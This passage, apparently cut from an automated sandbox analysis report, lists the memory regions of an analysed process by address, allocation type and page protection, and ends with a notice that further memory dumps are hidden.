page read and write
|
||
51BE000
|
stack
|
page read and write
|
||
78AE000
|
stack
|
page read and write
|
||
4715000
|
trusted library allocation
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page execute and read and write
|
||
3620000
|
trusted library allocation
|
page read and write
|
||
5360000
|
heap
|
page read and write
|
||
8ACB000
|
heap
|
page read and write
|
||
7340000
|
trusted library allocation
|
page read and write
|
||
60A8000
|
trusted library allocation
|
page read and write
|
||
3288000
|
heap
|
page read and write
|
||
7124000
|
heap
|
page read and write
|
||
5371000
|
trusted library allocation
|
page read and write
|
||
5709000
|
heap
|
page read and write
|
||
7189000
|
heap
|
page read and write
|
||
5552000
|
heap
|
page read and write
|
||
5293000
|
heap
|
page read and write
|
||
33FE000
|
heap
|
page read and write
|
||
4F23000
|
heap
|
page read and write
|
||
4AB5000
|
trusted library allocation
|
page execute and read and write
|
||
7194000
|
heap
|
page read and write
|
||
4DCF000
|
stack
|
page read and write
|
||
2BB1000
|
heap
|
page read and write
|
||
30F9000
|
heap
|
page read and write
|
||
31E8000
|
heap
|
page read and write
|
||
2C66000
|
heap
|
page read and write
|
||
7086000
|
direct allocation
|
page read and write
|
||
7146000
|
heap
|
page read and write
|
||
2FFC000
|
stack
|
page read and write
|
||
6B35000
|
heap
|
page read and write
|
||
6876000
|
trusted library allocation
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
305D000
|
heap
|
page read and write
|
||
5611000
|
heap
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
838E000
|
stack
|
page read and write
|
||
6504000
|
trusted library allocation
|
page read and write
|
||
54C6000
|
trusted library allocation
|
page read and write
|
||
6882000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
7DAD000
|
stack
|
page read and write
|
||
35DE000
|
stack
|
page read and write
|
||
5700000
|
heap
|
page read and write
|
||
80E0000
|
heap
|
page read and write
|
||
32CA000
|
heap
|
page read and write
|
||
6B2B000
|
heap
|
page read and write
|
||
4DB8000
|
trusted library allocation
|
page read and write
|
||
753D000
|
stack
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
3687000
|
heap
|
page read and write
|
||
2DEE000
|
stack
|
page read and write
|
||
620A000
|
trusted library allocation
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
687E000
|
trusted library allocation
|
page read and write
|
||
6834000
|
heap
|
page read and write
|
||
56A0000
|
heap
|
page read and write
|
||
749E000
|
stack
|
page read and write
|
||
554D000
|
heap
|
page read and write
|
||
6524000
|
trusted library allocation
|
page read and write
|
||
DCE000
|
stack
|
page read and write
|
||
7CEE000
|
stack
|
page read and write
|
||
2C78000
|
heap
|
page read and write
|
||
7E30000
|
trusted library allocation
|
page read and write
|
||
714E000
|
direct allocation
|
page read and write
|
||
6FEE000
|
stack
|
page read and write
|
||
3420000
|
heap
|
page read and write
|
||
66E0000
|
heap
|
page read and write
|
||
687C000
|
trusted library allocation
|
page read and write
|
||
555D000
|
heap
|
page read and write
|
||
6B37000
|
heap
|
page read and write
|
||
6DAB000
|
stack
|
page read and write
|
||
5278000
|
trusted library allocation
|
page read and write
|
||
4AEE000
|
stack
|
page read and write
|
||
4F63000
|
heap
|
page read and write
|
||
76AE000
|
stack
|
page read and write
|
||
2F10000
|
heap
|
page read and write
|
||
88A0000
|
trusted library allocation
|
page read and write
|
||
762F000
|
stack
|
page read and write
|
||
6858000
|
heap
|
page read and write
|
||
687C000
|
trusted library allocation
|
page read and write
|
||
2C7F000
|
stack
|
page read and write
|
||
6E6E000
|
stack
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
7140000
|
direct allocation
|
page read and write
|
||
33D8000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
2C74000
|
heap
|
page read and write
|
||
66E9000
|
heap
|
page read and write
|
||
50A6000
|
heap
|
page read and write
|
||
2C7C000
|
heap
|
page read and write
|
||
682A000
|
heap
|
page read and write
|
||
718D000
|
heap
|
page read and write
|
||
75FD000
|
trusted library allocation
|
page read and write
|
||
5040000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
527B000
|
trusted library allocation
|
page read and write
|
||
6875000
|
trusted library allocation
|
page read and write
|
||
712E000
|
stack
|
page read and write
|
||
4F68000
|
heap
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
73BE000
|
stack
|
page read and write
|
||
7A41000
|
heap
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
61A1000
|
trusted library allocation
|
page read and write
|
||
717E000
|
heap
|
page read and write
|
||
7194000
|
heap
|
page read and write
|
||
7148000
|
heap
|
page read and write
|
||
331C000
|
heap
|
page read and write
|
||
6EB0000
|
trusted library allocation
|
page read and write
|
||
6934000
|
heap
|
page read and write
|
||
27E0000
|
heap
|
page read and write
|
||
774A000
|
heap
|
page read and write
|
||
8E00000
|
trusted library allocation
|
page read and write
|
||
8C90000
|
trusted library allocation
|
page read and write
|
||
2C5F000
|
heap
|
page read and write
|
||
4A90000
|
trusted library allocation
|
page read and write
|
||
675B000
|
heap
|
page read and write
|
||
6877000
|
trusted library allocation
|
page read and write
|
||
4610000
|
trusted library allocation
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
2AFF000
|
stack
|
page read and write
|
||
4F70000
|
trusted library allocation
|
page read and write
|
||
773B000
|
heap
|
page read and write
|
||
7E70000
|
trusted library allocation
|
page read and write
|
||
74A0000
|
heap
|
page execute and read and write
|
||
6860000
|
heap
|
page read and write
|
||
78BE000
|
stack
|
page read and write
|
||
7122000
|
heap
|
page read and write
|
||
3225000
|
heap
|
page read and write
|
||
4700000
|
trusted library allocation
|
page read and write
|
||
7C4D000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
7B97000
|
heap
|
page read and write
|
||
7129000
|
heap
|
page read and write
|
||
84F0000
|
trusted library allocation
|
page read and write
|
||
9A0000
|
heap
|
page read and write
|
||
56A0000
|
heap
|
page read and write
|
||
53ED000
|
trusted library allocation
|
page read and write
|
||
89CE000
|
stack
|
page read and write
|
||
7082000
|
direct allocation
|
page read and write
|
||
7BAC000
|
heap
|
page read and write
|
||
7175000
|
heap
|
page read and write
|
||
4D90000
|
trusted library allocation
|
page read and write
|
||
7C50000
|
trusted library section
|
page read and write
|
||
6FA8000
|
heap
|
page read and write
|
||
4DB9000
|
trusted library allocation
|
page read and write
|
||
6B24000
|
heap
|
page read and write
|
||
34CA000
|
heap
|
page read and write
|
||
7131000
|
heap
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
554C000
|
heap
|
page read and write
|
||
6B10000
|
heap
|
page read and write
|
||
2C60000
|
heap
|
page read and write
|
||
719A000
|
heap
|
page read and write
|
||
52C0000
|
trusted library allocation
|
page execute and read and write
|
||
4B4E000
|
stack
|
page read and write
|
||
712F000
|
heap
|
page read and write
|
||
4E40000
|
heap
|
page read and write
|
||
4711000
|
trusted library allocation
|
page read and write
|
||
2C64000
|
heap
|
page read and write
|
||
2C74000
|
heap
|
page read and write
|
||
4640000
|
trusted library allocation
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
AE0000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page read and write
|
||
32FD000
|
unkown
|
page read and write
|
||
45F4000
|
trusted library allocation
|
page read and write
|
||
3248000
|
heap
|
page read and write
|
||
AE61000
|
trusted library allocation
|
page read and write
|
||
682A000
|
heap
|
page read and write
|
||
3025000
|
heap
|
page read and write
|
||
539E000
|
stack
|
page read and write
|
||
70211000
|
unkown
|
page execute read
|
||
4F6B000
|
heap
|
page read and write
|
||
84D0000
|
trusted library allocation
|
page execute and read and write
|
||
2C78000
|
heap
|
page read and write
|
||
33D0000
|
heap
|
page read and write
|
||
75D0000
|
trusted library allocation
|
page read and write
|
||
5180000
|
trusted library allocation
|
page read and write
|
||
4E47000
|
heap
|
page read and write
|
||
54DE000
|
stack
|
page read and write
|
||
2CAC000
|
stack
|
page read and write
|
||
4F2C000
|
heap
|
page read and write
|
||
473000
|
remote allocation
|
page execute and read and write
|
||
51F0000
|
heap
|
page read and write
|
||
6825000
|
heap
|
page read and write
|
||
7157000
|
heap
|
page read and write
|
||
476000
|
remote allocation
|
page execute and read and write
|
||
2CED000
|
stack
|
page read and write
|
||
70E0000
|
direct allocation
|
page read and write
|
||
2C83000
|
heap
|
page read and write
|
||
32CA000
|
heap
|
page read and write
|
||
89BE000
|
stack
|
page read and write
|
||
6819000
|
heap
|
page read and write
|
||
717E000
|
heap
|
page read and write
|
||
5287000
|
trusted library allocation
|
page read and write
|
||
3470000
|
heap
|
page read and write
|
||
70226000
|
unkown
|
page readonly
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
4AB2000
|
trusted library allocation
|
page read and write
|
||
7630000
|
trusted library allocation
|
page read and write
|
||
75AB000
|
stack
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
54E7000
|
trusted library allocation
|
page read and write
|
||
5705000
|
heap
|
page read and write
|
||
66E9000
|
heap
|
page read and write
|
||
35B0000
|
heap
|
page read and write
|
||
778A000
|
heap
|
page read and write
|
||
324B000
|
heap
|
page read and write
|
||
753B000
|
heap
|
page read and write
|
||
8A6B000
|
stack
|
page read and write
|
||
8160000
|
trusted library allocation
|
page read and write
|
||
7ABB000
|
heap
|
page read and write
|
||
7022F000
|
unkown
|
page readonly
|
||
570E000
|
heap
|
page read and write
|
||
114E000
|
stack
|
page read and write
|
||
511E000
|
stack
|
page read and write
|
||
2BB1000
|
heap
|
page read and write
|
||
6B21000
|
heap
|
page read and write
|
||
8970000
|
heap
|
page read and write
|
||
45FD000
|
trusted library allocation
|
page execute and read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
8A20000
|
heap
|
page read and write
|
||
6B59000
|
heap
|
page read and write
|
||
7D2E000
|
stack
|
page read and write
|
||
718D000
|
heap
|
page read and write
|
||
6EAA000
|
stack
|
page read and write
|
||
2B1E000
|
stack
|
page read and write
|
||
7171000
|
heap
|
page read and write
|
||
7D4F000
|
stack
|
page read and write
|
||
330E000
|
heap
|
page read and write
|
||
C66000
|
heap
|
page read and write
|
||
765E000
|
stack
|
page read and write
|
||
7730000
|
heap
|
page read and write
|
||
35E0000
|
heap
|
page read and write
|
||
5538000
|
heap
|
page read and write
|
||
6860000
|
heap
|
page read and write
|
||
74BE000
|
stack
|
page read and write
|
||
75E0000
|
trusted library allocation
|
page read and write
|
||
2AD0000
|
heap
|
page read and write
|
||
2C54000
|
heap
|
page read and write
|
||
31C0000
|
heap
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
7780000
|
heap
|
page read and write
|
||
56D7000
|
heap
|
page read and write
|
||
6875000
|
heap
|
page read and write
|
||
55C8000
|
heap
|
page read and write
|
||
51FF000
|
stack
|
page read and write
|
||
7DE0000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
7374000
|
heap
|
page read and write
|
||
3249000
|
heap
|
page read and write
|
||
D80000
|
heap
|
page read and write
|
||
53B8000
|
trusted library allocation
|
page read and write
|
||
2B20000
|
heap
|
page read and write
|
||
2E08000
|
heap
|
page read and write
|
||
8100000
|
heap
|
page read and write
|
||
4BC0000
|
heap
|
page execute and read and write
|
||
6A30000
|
heap
|
page read and write
|
||
7620000
|
trusted library allocation
|
page read and write
|
||
4C4E000
|
stack
|
page read and write
|
||
70BE000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
31E0000
|
heap
|
page read and write
|
||
766D000
|
stack
|
page read and write
|
||
4FAB000
|
heap
|
page read and write
|
||
55B8000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
66E9000
|
heap
|
page read and write
|
||
2C6A000
|
heap
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
515E000
|
stack
|
page read and write
|
||
7A80000
|
trusted library allocation
|
page read and write
|
||
2C4F000
|
heap
|
page read and write
|
||
718F000
|
heap
|
page read and write
|
||
3254000
|
heap
|
page read and write
|
||
5700000
|
heap
|
page read and write
|
||
B461000
|
trusted library allocation
|
page read and write
|
||
34A8000
|
heap
|
page read and write
|
||
7126000
|
heap
|
page read and write
|
||
2BB6000
|
heap
|
page read and write
|
||
5610000
|
heap
|
page read and write
|
||
718D000
|
heap
|
page read and write
|
||
5594000
|
trusted library allocation
|
page read and write
|
||
70210000
|
unkown
|
page readonly
|
||
719A000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
792E000
|
stack
|
page read and write
|
||
6B15000
|
heap
|
page read and write
|
||
3748000
|
heap
|
page read and write
|
||
7E50000
|
trusted library allocation
|
page read and write
|
||
584F000
|
stack
|
page read and write
|
||
324E000
|
heap
|
page read and write
|
||
3460000
|
trusted library allocation
|
page read and write
|
||
773E000
|
stack
|
page read and write
|
||
5652000
|
heap
|
page read and write
|
||
75EE000
|
stack
|
page read and write
|
||
7A72000
|
heap
|
page read and write
|
||
3279000
|
heap
|
page read and write
|
||
5573000
|
heap
|
page read and write
|
||
2C89000
|
heap
|
page read and write
|
||
6B5B000
|
heap
|
page read and write
|
||
6B21000
|
heap
|
page read and write
|
||
2D8E000
|
stack
|
page read and write
|
||
317E000
|
stack
|
page read and write
|
||
6B7A000
|
heap
|
page read and write
|
||
756D000
|
stack
|
page read and write
|
||
110E000
|
stack
|
page read and write
|
||
A461000
|
trusted library allocation
|
page read and write
|
||
7AB0000
|
trusted library allocation
|
page read and write
|
||
2BC0000
|
heap
|
page read and write
|
||
7EC0000
|
trusted library allocation
|
page read and write
|
||
88C0000
|
trusted library allocation
|
page read and write
|
||
3243000
|
heap
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
2C10000
|
heap
|
page read and write
|
||
2C4F000
|
heap
|
page read and write
|
||
7790000
|
heap
|
page read and write
|
||
55BA000
|
heap
|
page read and write
|
||
4850000
|
heap
|
page read and write
|
||
7182000
|
heap
|
page read and write
|
||
7378000
|
heap
|
page read and write
|
||
7785000
|
heap
|
page read and write
|
||
7CA7000
|
trusted library allocation
|
page read and write
|
||
C57000
|
heap
|
page read and write
|
||
5190000
|
heap
|
page execute and read and write
|
||
322E000
|
heap
|
page read and write
|
||
8AC1000
|
heap
|
page read and write
|
||
2BED000
|
heap
|
page read and write
|
||
7E90000
|
trusted library allocation
|
page read and write
|
||
568D000
|
heap
|
page read and write
|
||
7A70000
|
trusted library allocation
|
page read and write
|
||
30F6000
|
heap
|
page read and write
|
||
687C000
|
trusted library allocation
|
page read and write
|
||
8C80000
|
trusted library allocation
|
page execute and read and write
|
||
5DD0000
|
trusted library allocation
|
page read and write
|
||
5A2F000
|
stack
|
page read and write
|
||
2A78000
|
stack
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
7171000
|
heap
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
365A000
|
trusted library allocation
|
page execute and read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
2B3E000
|
stack
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
71A0000
|
heap
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
719A000
|
heap
|
page read and write
|
||
6B25000
|
heap
|
page read and write
|
||
50D0000
|
heap
|
page execute and read and write
|
||
6DB0000
|
trusted library allocation
|
page read and write
|
||
9411000
|
trusted library allocation
|
page read and write
|
||
56FD000
|
heap
|
page read and write
|
||
6DC0000
|
trusted library allocation
|
page read and write
|
||
7184000
|
heap
|
page read and write
|
||
73EE000
|
stack
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
4F6B000
|
heap
|
page read and write
|
||
66E1000
|
heap
|
page read and write
|
||
7AD0000
|
trusted library allocation
|
page read and write
|
||
324E000
|
stack
|
page read and write
|
||
75FF000
|
trusted library allocation
|
page read and write
|
||
1150000
|
heap
|
page read and write
|
||
3630000
|
heap
|
page read and write
|
||
7120000
|
direct allocation
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
324C000
|
heap
|
page read and write
|
||
2BB7000
|
heap
|
page read and write
|
||
BE61000
|
trusted library allocation
|
page read and write
|
||
2C5F000
|
heap
|
page read and write
|
||
34DF000
|
stack
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
7660000
|
trusted library allocation
|
page read and write
|
||
55B8000
|
heap
|
page read and write
|
||
7E00000
|
trusted library allocation
|
page read and write
|
||
2C0E000
|
heap
|
page read and write
|
||
716E000
|
stack
|
page read and write
|
||
8150000
|
trusted library allocation
|
page read and write
|
||
34BA000
|
heap
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
719A000
|
heap
|
page read and write
|
||
55B6000
|
heap
|
page read and write
|
||
6B37000
|
heap
|
page read and write
|
||
76FB000
|
stack
|
page read and write
|
||
5B12000
|
trusted library allocation
|
page read and write
|
||
5170000
|
trusted library allocation
|
page read and write
|
||
83C000
|
stack
|
page read and write
|
||
6819000
|
heap
|
page read and write
|
||
3463000
|
trusted library allocation
|
page execute and read and write
|
||
743E000
|
stack
|
page read and write
|
||
5550000
|
heap
|
page read and write
|
||
32D0000
|
heap
|
page read and write
|
||
5228000
|
trusted library allocation
|
page read and write
|
||
5220000
|
heap
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
550D000
|
trusted library allocation
|
page read and write
|
||
6069000
|
trusted library allocation
|
page read and write
|
||
75A0000
|
trusted library allocation
|
page read and write
|
||
726E000
|
stack
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
2B3E000
|
stack
|
page read and write
|
||
767A000
|
stack
|
page read and write
|
||
323A000
|
heap
|
page read and write
|
||
4ED4000
|
trusted library allocation
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
7740000
|
heap
|
page read and write
|
||
753E000
|
stack
|
page read and write
|
||
7BE1000
|
heap
|
page read and write
|
||
73BD000
|
heap
|
page read and write
|
||
714E000
|
direct allocation
|
page read and write
|
||
7129000
|
heap
|
page read and write
|
||
5C69000
|
trusted library allocation
|
page read and write
|
||
6C2B000
|
trusted library allocation
|
page read and write
|
||
9E11000
|
trusted library allocation
|
page read and write
|
||
8AA2000
|
heap
|
page read and write
|
||
4DD0000
|
trusted library allocation
|
page read and write
|
||
6B32000
|
heap
|
page read and write
|
||
58E5000
|
trusted library allocation
|
page read and write
|
||
5290000
|
heap
|
page read and write
|
||
3740000
|
heap
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
5652000
|
heap
|
page read and write
|
||
718F000
|
heap
|
page read and write
|
||
7469000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
6B27000
|
heap
|
page read and write
|
||
4FC0000
|
heap
|
page read and write
|
||
7252000
|
heap
|
page read and write
|
||
6881000
|
trusted library allocation
|
page read and write
|
||
6C1F000
|
trusted library allocation
|
page read and write
|
||
7182000
|
heap
|
page read and write
|
||
7119000
|
heap
|
page read and write
|
||
2C66000
|
heap
|
page read and write
|
||
5703000
|
heap
|
page read and write
|
||
7AAE000
|
heap
|
page read and write
|
||
30BD000
|
heap
|
page read and write
|
||
32E9000
|
heap
|
page read and write
|
||
6DD0000
|
trusted library allocation
|
page read and write
|
||
5705000
|
heap
|
page read and write
|
||
6888000
|
trusted library allocation
|
page read and write
|
||
7BD5000
|
heap
|
page read and write
|
||
7350000
|
heap
|
page execute and read and write
|
||
3680000
|
heap
|
page read and write
|
||
893E000
|
stack
|
page read and write
|
||
67EB000
|
heap
|
page read and write
|
||
7E40000
|
trusted library allocation
|
page read and write
|
||
66E4000
|
heap
|
page read and write
|
||
4B8F000
|
stack
|
page read and write
|
||
4AD0000
|
trusted library allocation
|
page read and write
|
||
2B6B000
|
heap
|
page read and write
|
||
67EB000
|
heap
|
page read and write
|
||
D1A000
|
stack
|
page read and write
|
||
651C000
|
trusted library allocation
|
page read and write
|
||
7100000
|
direct allocation
|
page read and write
|
||
4DA3000
|
trusted library allocation
|
page execute and read and write
|
||
362D000
|
trusted library allocation
|
page execute and read and write
|
||
8060000
|
trusted library allocation
|
page read and write
|
||
2B5E000
|
heap
|
page read and write
|
||
8AB0000
|
heap
|
page read and write
|
||
75D0000
|
trusted library allocation
|
page read and write
|
||
45E0000
|
trusted library allocation
|
page read and write
|
||
6EA9000
|
trusted library allocation
|
page read and write
|
||
83D1000
|
trusted library allocation
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
6EA2000
|
trusted library allocation
|
page read and write
|
||
6885000
|
trusted library allocation
|
page read and write
|
||
AD0000
|
heap
|
page read and write
|
There are 1340 hidden memdumps, click here to show them.